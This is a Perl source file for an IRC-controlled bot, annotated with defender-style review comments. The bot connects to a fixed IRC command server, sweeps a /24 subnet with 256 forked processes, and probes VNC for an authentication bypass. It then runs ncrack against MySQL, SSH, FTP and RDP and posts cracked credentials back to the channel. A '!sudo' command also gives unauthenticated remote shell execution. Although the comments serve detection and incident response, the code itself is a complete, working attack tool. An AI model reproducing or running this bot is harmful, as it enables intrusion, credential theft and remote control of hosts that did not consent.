- #!/usr/bin/perl
- # Use at your own risk!
- #For it to crack you need to install ncrack or be using a l337 OS like KaliLinux v2
- #Also you will need to create /user and /pass file (the tested credentials on target)
- #The code is still buggy. Sorry but I'm still noob at perl >_>
- #invoke the script like this: sudo perl scan.pl (or as root) perl scan.pl
- #This script was made for educational purposes only, please don't attack military nor government.
- #when you think you got passwords in your list, type !list to the bot or channel and it will say it found credentials
- use IO::Socket;
- use IO::Socket::INET;
- use threads;
- use threads::shared;
- use Errno qw(EAGAIN);
- use strict;
- use warnings;
- # ---------------------------------------------------------------------------
- # Review notes (defender's perspective). This is an IRC-controlled bot that
- # (a) takes commands from an IRC channel, (b) forks to sweep a /24 and
- # (c) drives ncrack against hosts it finds. The comments added below describe
- # observable behaviour for detection and incident response; no code changed.
- # ---------------------------------------------------------------------------
- my $line;                     # current line received from the IRC server
- our @results : shared;        # per-host result strings, indexed by host number.
-                               # threads::shared only shares between threads; this
-                               # script forks (DivideWork), so each child process
-                               # works on its own private copy.
- our $todo = 0;                # work-slice index built up by DivideWork
- our $contatore = 0;           # declared but never referenced on this page
- my $orig_thread = "yes";      # set to "no" in forked children; never read on this page
- my $start;                    # first host number this process scans
- my $end;                      # last host number this process scans
- my $out_file;                 # declared but never referenced on this page
- my $range = 99999;
- my $random_number = int(rand($range));   # 0..99998, only used to vary the nick / USER line
- my @VNC_PORTS = qw/5900 5901/;                      # VNC probe targets (see Scan_ALL)
- my @ncrack_PORTS = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );   # [port, label]; label is lowercased into the ncrack target URI
- my $splits = 8; # Creates 2^N processes.
- our $subnet;                  # "x.y.z." prefix set by the !scan handler, read by Scan_ALL
- # Command-and-control indicators: fixed server, port 6667, nick "Guest<digits>" and
- # channel #RDP. All bot output goes to that channel through printa().
- my $server="irc.crimeircd.net"; # irc server
- my $porta="6667"; # port
- my $nick="Guest$random_number";# nick
- my $canale="#RDP"; # channel
- my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
- $sk->autoflush(1);
- # IRC registration. The USER real-name field "Perl bot by independent" is a fixed
- # string in every session.
- print $sk "NICK $nick\r\n";
- print $sk "USER Guest$random_number 8 * :Perl bot by independent\r\n";
- # Main loop. Every server line is echoed to STDERR via warn and then tested against
- # the command patterns below. All patterns are unanchored substring matches and no
- # check is made on who sent the line, so any received line containing e.g. "!sudo"
- # triggers the handler regardless of sender.
- while ($line = <$sk>) {
- $line =~ s/\r\n$//;
- warn "$line";
- # Any line containing "PING": reply PONG, (re)JOIN the channel and post a
- # channel message carrying a pastebin URL.
- if ($line=~ /PING/) {
- print $sk "PONG :$server\r\n";
- print $sk "JOIN $canale \r\n";
- printa("?Ping Pong!, pastebin.com/raw/cp5BZnv4");
- }
- # Answer the server's nospoof check with a NOTICE claiming to be mIRC v7.45.
- if ($line=~ /nospoof/) {
- print $sk "NOTICE IRC :mIRC v7.45\r\n";
- print $sk "CAP LS\r\n";
- print $sk "CAP END\r\n";
- }
- if ($line=~ /!help/) {
- printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
- }
- # !list: reads xploits.log from the current working directory (the file Scan_ALL
- # appends ncrack output to) and posts every line containing a single quote to the
- # channel. This is the path by which cracked credentials leave the host.
- if ($line=~ /!list/)
- {
- my $file = 'xploits.log';
- open my $fh, '<', $file or warn "Could not open '$file' $!\n";
- while (my $lines = <$fh>) {
- chomp $lines;
- if ($lines=~ /'/) {
- printa("$lines");
- }
- }
- }
- # !reload / !die: the single-string command contains "&&", so system() runs it
- # through a shell; "sudo pkill perl" kills every perl process on the host,
- # this bot included.
- if ($line=~ /!reload/)
- {
- printa("Reloading...");
- my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill ncrack");
- system(@cmd);
- }
- if ($line=~ /!die/)
- {
- printa("Dying...");
- my @cmd = ("sudo pkill perl && sudo pkill ncrack");
- system(@cmd);
- }
- # !sudo <cmd>: remote command execution. The remainder of the received line is run
- # through the shell under sudo and its combined stdout/stderr is posted back to the
- # channel line by line. There is no sender check and no filtering of the text.
- if ($line=~ /!sudo\s+(.*)/)
- {
- my $command = $1;
- printa("Done: $command ");
- my $cmd = "sudo $command";
- my @output = `$cmd 2>&1 3>&1`;
- foreach(@output) {
- printa("$_\r\n");
- }
- }
- # !scan <ip>: accepts any argument that starts with three dotted octets, keeps only
- # the "x.y.z." prefix, forks $splits times (2^8 = 256 processes at the default) and
- # has each process call Scan_ALL for its share of host numbers 0..255.
- if ($line=~ /!scan (.+)/)
- {
- $todo = 0;
- $subnet = $1;
- if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
- # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
- $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
- $subnet .= ".";
- printa("Scanning subnet ${subnet}x\n");
- CHECK: {
- unless ($splits >= 0 && $splits <= 8) {
- die "ERROR: Do not split $splits times--that makes no sense.\n";
- }
- }
- # Ugly, but this works.
- # Each DivideWork call forks every process that exists so far, so N calls yield
- # 2^N processes. Every child inherits the IRC socket $sk, so channel messages
- # from printa can originate from any of them.
- DivideWork() if $splits >= 1;
- DivideWork() if $splits >= 2;
- DivideWork() if $splits >= 3;
- DivideWork() if $splits >= 4;
- DivideWork() if $splits >= 5;
- DivideWork() if $splits >= 6;
- DivideWork() if $splits >= 7;
- DivideWork() if $splits >= 8;
- # With $splits == 8 each process gets a slice of exactly one host number.
- $start = $todo << (8 - $splits);
- $end = $start + (256 / (2**$splits)) - 1;
- foreach ($start .. $end) {
- Scan_ALL($_);
- }
- }
- else {
- printa("Are you brain-dead? Use a correct IP format. ");
- }
- }
- }
- ####################################
- sub DivideWork {
- # Forks the calling process once. $todo is doubled before the fork and the parent
- # then adds one, so after N calls every process holds a distinct N-bit index in
- # $todo; the !scan handler turns that index into the process's host-number slice.
- # EAGAIN is retried after 7 seconds (note that `redo FORK` re-runs the doubling
- # line as well); any other fork failure is reported to the IRC channel and the
- # caller carries on as a single process with the already-doubled $todo.
- my $pid;
- FORK: {
- $todo *= 2;
- if ($pid = fork) {
- # Parent
- ++$todo;
- } elsif (defined $pid) {
- # Child
- $orig_thread = "no";
- } elsif ($! == EAGAIN) {
- # Recoverable forking error.
- sleep 7;
- redo FORK;
- } else {
- # Unable to fork.
- printa("Unable to fork: $!\n");
- }
- }
- }
- sub Scan_ALL {
- # Scan for OpenVNC 4.11 authentication bypass.
- # Probes a single host ($subnet . $hostnum). Network footprint, in order:
- #   1. TCP connects to 5900 and 5901 and performs the short VNC exchange below,
- #      recording "VNC Vulnerable" in @results and announcing it on IRC;
- #   2. TCP connects to 3306, 22, 21, 3389; on the first port that accepts, runs
- #      ncrack (wordlists /user and /pass) against that service, appends ncrack's
- #      output to ./xploits.log, and returns without trying the remaining ports.
- # Host numbers 0 and 255 are skipped. All IRC announcements go through printa().
- my $hostnum = shift;
- my $host = $subnet . $hostnum;
- my $sock;              # never assigned: the `my $sock` inside each if() shadows it
- my $proto_ver;
- my $ignored;
- my $auth_type;
- my $sec_types;
- my $vnc_data;
- $host or printa("ERROR: missing Host IP address Scan_ALL.");
- # The host numbers .0 and .255 are reserved; ignore them.
- if ($hostnum <= 0 or $hostnum >= 255) { return; }
- # Format things nicely--that crazy formula just adds spaces.
- $results[$hostnum] = "$host";
- $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
- # None of the $sock->read() return values below are checked; short or empty
- # reads leave the buffers undefined or partially filled.
- foreach my $port (@VNC_PORTS)
- {
- if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')) {
- $sock->read($proto_ver, 12);
- print $sock $proto_ver;
- # Get supported security types and ignore them.
- $sock->read($sec_types, 1);
- $sock->read($ignored, unpack('C', $sec_types));
- # Claim that we only support no authentication.
- print $sock "\x01";
- # We should get "0000" back, indicating that they won't fall back to no authentication.
- $sock->read($auth_type, 4);
- if (unpack('I', $auth_type)) {
- close($sock);
- return;
- }
- # Client initialize.
- print $sock "\x01";
- # If the server starts sending data, we're in.
- $sock->read($vnc_data, 4);
- printa("[Xploiting VNC] $host");
- if (unpack('I', $vnc_data)) {
- $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
- # "9,3" looks like an IRC colour code whose leading control byte was lost in
- # the paste -- unconfirmed.
- printa("9,3 [ $port ] $results[$hostnum] $port ");
- }
- }
- }
- foreach my $port (@ncrack_PORTS)
- {
- if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port->[0], Proto => 'tcp')) {
- close($sock);
- printa("[Cracking " . $port->[1] . "] $host");
- # Single-string system(): the command is executed by a shell; the ">>xploits.log"
- # redirect is what the !list handler later reads back. $host is built only from
- # digits and dots (see the !scan handler), so no other text reaches the shell here.
- my @cmdncrack = ("ncrack -U /user -P /pass " . lc($port->[1]) . "://" . $host . ",at=5,cl=1,CL=3,cd=5s,cr=0,to=2h --connection-limit 64 -v -f >>xploits.log");
- system(@cmdncrack);
- return;
- }
- }
- # Closes the outer, never-opened $sock (the connected handles are scoped to the
- # if() blocks above).
- close($sock);
- return;
- }
- sub printa {
- # Sends $_[0] as a PRIVMSG to $canale over the global IRC socket $sk. The fixed
- # "4,5 " prefix and trailing ". " appear in every message the bot emits and make a
- # usable detection signature; the digits look like an IRC colour code whose leading
- # control byte did not survive the paste -- unconfirmed.
- print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
- }